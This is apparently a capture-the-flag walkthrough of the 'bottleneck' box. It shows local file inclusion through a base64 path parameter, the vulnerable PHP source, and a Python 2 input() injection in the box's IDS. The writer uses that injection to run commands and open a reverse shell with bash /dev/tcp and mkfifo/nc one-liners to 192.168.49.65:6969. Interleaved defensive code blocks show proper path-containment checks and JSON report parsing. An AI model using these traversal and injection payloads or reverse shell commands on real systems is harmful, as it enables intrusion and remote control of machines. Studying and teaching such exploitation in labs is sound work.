3 :80 exploit

Using https://github.com/iamkashz/ctf-scripts/blob/main/HTB/bottleneck-lfi.py

$ python3 bottleneck_exploit.py
> Requsting http://192.168.65.22:80/image_gallery.php
http://192.168.65.22:80/image_gallery.php
[!!] exit or quit to return!
File to read: /etc/passwd
[!!] Generating unix time stamp
> Requested http://192.168.65.22:80/image_gallery.php with params {'t': '1629345414', 'f': 'L2V0Yy9wYXNzd2Q='}

Let me throw away your nice request into the bin.
The SOC was informed about your attempt to break into this site. Thanks to previous attackers effort in smashing my infrastructructure I will take strong legal measures.
Why don't you wait on your chair until someone (maybe the police) knock on your door?

<pre>
                                   _,..._
                                  /__    \
                                   >< `.  \
                                  /_    \ |
                                   \-_  /:|
                                 ,--'..'. :
                               ,'         `.
                            _,'             \
                   _.._,--''    ,           |
               , ,',, _|    _,.'|      |    |
            \||/,'(,' '--''    |      |    |
       _     |||                |      /-'  |
      | |   (- -)<`._           |     /    /
      | |  \_\O/_/`-.(<<        |____/    /
      | |   /   \              / -'| `--.'|
      | |   \___/             /           /
      | |    H H             /     |     |
      |_|_..-H-H--.._       /     ,|     |
        |-.._"_"__..-|     |   _-/ |     |
        |            |     |    |   \_   |
        |            |     |    |   |    |
        |            |     |____|   |    |
        |            |  _..'    |   |____|
        |            |_(____..._' _.'    |
        `-..______..-'""         (___..--'
<pre>
# requesting image_gallery.php file
File to read: ../image_gallery.php
[!!] Generating unix time stamp
> Requested http://192.168.65.22:80/image_gallery.php with params {'t': '1629345501', 'f': 'Li4vaW1hZ2VfZ2FsbGVyeS5waHA='}
<?php
/*
CHANGELOG
v1.1: Still testing without content.
    I've fixed that problem that @p4w and @ska notified me after hacker attack.
    Shit I'm too lazy to make a big review of my code.
    I think that the LFI problem can be mitigated with the blacklist.
    By the way to protect me from attackers, all malicious requests are immediately sent to the SOC

v1.0: Starting this beautiful gallery
*/

$tstamp = time();
if(isset($_GET['t']) && isset($_GET['f'])){
    include_once 'image_gallery_load.php';
    exit();
}

?>
[truncated]

# image_gallery.php includes image_gallery_load.php; requesting that file next
<?php
function print_troll(){
    $messages = $GLOBALS['messages'];
    $troll = $GLOBALS['troll'];
    echo $messages[0];
    echo $troll;
}

$troll = <troll-image>

if(!isset($_GET['t']) || !isset($_GET['f'])){
    exit();
}

$imagefile = base64_decode($_GET['f']);
$timestamp = time();
$isblocked = FALSE;
$blacklist = array('/etc','/opt','/var','/opt','/proc','/dev','/lib','/bin','/usr','/home','/ids');
$messages = array("\nLet me throw away your nice request into the bin.\n".
    "The SOC was informed about your attempt to break into this site. Thanks to previous attackers effort in smashing my infrastructructure I will take strong legal measures.\n".
    "Why don't you wait on your chair until someone (maybe the police) knock on your door?\n\n");

if(abs($_GET['t'] - $timestamp) > 10){
    exit();
}
foreach($blacklist as $elem){
    if(strstr($imagefile, $elem) !== FALSE)
        $isblocked = TRUE;
}
// report the intrusion to the soc and save information locally for further investigation
if($isblocked){
    $logfile = 'intrusion_'.$timestamp;
    $fp = fopen('/var/log/soc/'.$logfile, 'w');
    fwrite($fp, "'".$imagefile."'");
    fclose($fp);
    exec('python /opt/ids_strong_bvb.py </var/log/soc/'.$logfile.' >/tmp/output 2>&1');
    print_troll();
    exit();
}
chdir('img');
$filecontent = file_get_contents($imagefile);
if($filecontent === FALSE){
    print_troll();
}
else{
    echo $filecontent;
}
chdir('../');

?>
# this tells us: if the f and t params are not set, the script exits;
# any path containing a blacklisted string is blocked, the page does not load and the troll image is printed;
# but for such a blocked path the exec command is run and its output is saved to /tmp/output
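Why the blacklist in image_gallery_load.php lets the traversal through, and what the check should have looked like, as an added example (this is not the challenge's code). The blacklist tuple is copied from the PHP above; `IMG_DIR` is an assumption (the shell later lands in ~/html, but the page never states the images' absolute path). `resolve_within()` is the containment check the PHP should run before `file_get_contents()`: resolve the requested name against the image directory and accept it only if the resolved path stays inside that directory.

```python
import base64
import os

# Blacklist copied verbatim from image_gallery_load.php on this page.
BLACKLIST = ('/etc', '/opt', '/var', '/opt', '/proc', '/dev', '/lib', '/bin', '/usr', '/home', '/ids')

# Assumed location of the gallery's image directory (not stated on the page).
IMG_DIR = '/var/www/html/img'


def decode_f_param(f_param: str) -> str:
    """The app base64-decodes the f parameter before any check; do the same here."""
    return base64.b64decode(f_param).decode('utf-8', errors='replace')


def blacklist_blocks(requested: str) -> bool:
    """Mirror of the page's strstr() loop: blocked only if a listed string occurs anywhere."""
    return any(elem in requested for elem in BLACKLIST)


def resolve_within(base_dir: str, requested: str):
    """Containment check the app should use instead of a blacklist: resolve the
    name relative to base_dir and accept it only if the resolved path is still
    inside base_dir. Returns the absolute path, or None when it escapes."""
    base = os.path.realpath(base_dir)
    # os.path.join() discards base for an absolute name, so '/etc/passwd' resolves to itself.
    candidate = os.path.realpath(os.path.join(base, requested))
    # commonpath() rather than startswith(): '/img2/x' must not pass for base '/img'.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def compare(f_params):
    """For each encoded f value return (decoded, blacklist_blocked, containment_result)."""
    rows = []
    for f in f_params:
        decoded = decode_f_param(f)
        rows.append((decoded, blacklist_blocks(decoded), resolve_within(IMG_DIR, decoded)))
    return rows


if __name__ == '__main__':
    # The three f values sent in the session above, plus one constructed legitimate name.
    samples = [
        'L2V0Yy9wYXNzd2Q=',                          # /etc/passwd
        'Li4vaW1hZ2VfZ2FsbGVyeS5waHA=',              # ../image_gallery.php
        'Li4vLi4vLi4vLi4vLi4vLi4vdG1wL291dHB1dA==',  # ../../../../../../tmp/output
        base64.b64encode(b'cat.png').decode(),       # an ordinary gallery image
    ]
    for decoded, blocked, resolved in compare(samples):
        print(f'{decoded!r:34} blacklist_blocks={blocked!s:5} containment={resolved}')
```

Running it shows the gap: only `/etc/passwd` trips the blacklist, while `../image_gallery.php` and `../../../../../../tmp/output` sail through it, yet all three are rejected by the containment check because their resolved paths leave `IMG_DIR`. A short allowlist of image filenames would be stricter still, but the containment check alone already closes the traversal used here.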
# reading /tmp/output
File to read: ../../../../../../tmp/output
> Requested http://192.168.65.22:80/image_gallery.php with params {'t': '1629346874', 'f': 'Li4vLi4vLi4vLi4vLi4vLi4vdG1wL291dHB1dA=='}
report: [+] sending the message: /etc/passwd

# after requesting a malformed file path, reading /tmp/output again shows the IDS traceback

File to read: ../../../../../../tmp/output
> Requested http://192.168.65.22:80/image_gallery.php with params {'t': '1629346942', 'f': 'Li4vLi4vLi4vLi4vLi4vLi4vdG1wL291dHB1dA=='}
report: Traceback (most recent call last):
  File "/opt/ids_strong_bvb.py", line 7, in <module>
    data = str(input('report: '))
  File "<string>", line 1
    '/etc/passwd' <?>'
                   ^
SyntaxError: invalid syntax

# the IDS reads the logged filename with Python 2's input(), which evaluates it as a Python expression (hence the SyntaxError in File "<string>")
# exploiting input() in python
# tried
CMD: /etc/passwd' and __import__('os').system('bash -i >& /dev/tcp/192.168.49.65/6969 0>&1')
ERR in /tmp/output: SyntaxError: EOL while scanning string literal
meaning: the string literal was not terminated properly

CMD: /etc/passwd' and __import__('os').system('bash -i >& /dev/tcp/192.168.49.65/6969 0>&1')#
ERR: sh: 1: Syntax error: Bad fd number

CMD: /etc/passwd' and __import__('os').system('whoami;id')#
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)

CMD: /etc/passwd' and __import__('os').system('bash -c \'bash -i >& /dev/tcp/192.168.49.65/6969 0>&1\'')#
CMD: /etc/' and __import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.49.65 6969 >/tmp/f')#
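The root cause of the chain above is that the intrusion report is written as a quoted literal and then read back with Python 2's `input()`, which evaluates whatever it reads. The following is an added example of the fixed report handling, not the challenge's own `ids_strong_bvb.py`: the PHP side would store the requested name as a JSON document instead of `"'".$imagefile."'"`, and the IDS parses that document as data. The JSON layout and reading from a file path (rather than the stdin redirect the page's `exec()` uses) are assumptions made for this example.

```python
import json
import os
import tempfile


def write_report(log_path: str, requested_file: str) -> None:
    """Replacement for fwrite($fp, "'".$imagefile."'"): store the value as a JSON
    document, so quotes, newlines and '#' characters inside it are plain data."""
    with open(log_path, 'w', encoding='utf-8') as fp:
        json.dump({'requested': requested_file}, fp)


def parse_report_text(text: str) -> str:
    """Replacement for `data = str(input('report: '))`: parse the report as data.
    Nothing in it is evaluated, so its content cannot change what the IDS does."""
    report = json.loads(text)
    if not isinstance(report, dict) or not isinstance(report.get('requested'), str):
        raise ValueError('malformed intrusion report')
    return report['requested']


def read_report(log_path: str) -> str:
    """Read one report file and return the requested filename it records."""
    with open(log_path, 'r', encoding='utf-8') as fp:
        return parse_report_text(fp.read())


def roundtrip(requested_file: str) -> str:
    """Write and read back one report in a temporary directory (stand-in for /var/log/soc)."""
    with tempfile.TemporaryDirectory() as soc_dir:
        path = os.path.join(soc_dir, 'intrusion_sample')
        write_report(path, requested_file)
        return read_report(path)


if __name__ == '__main__':
    # Constructed sample: a requested name containing a quote and a '#',
    # the characters that derailed the original report parsing.
    sample = "/etc/passwd' -- probe #1"
    print('IDS saw:', repr(roundtrip(sample)))
```

On Python 2 the minimal fix would have been `raw_input()` instead of `input()`; on Python 3 `input()` already returns a string. Either way, the durable fix is the structured format above: the IDS never has to guess where the attacker-controlled value ends.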

$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [192.168.49.65] from (UNKNOWN) [192.168.65.22] 37798
bash: cannot set terminal process group (803): Inappropriate ioctl for device
bash: no job control in this shell
www-data@bottleneck:~/html$ whoami;id;hostname
whoami;id;hostname
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bottleneck
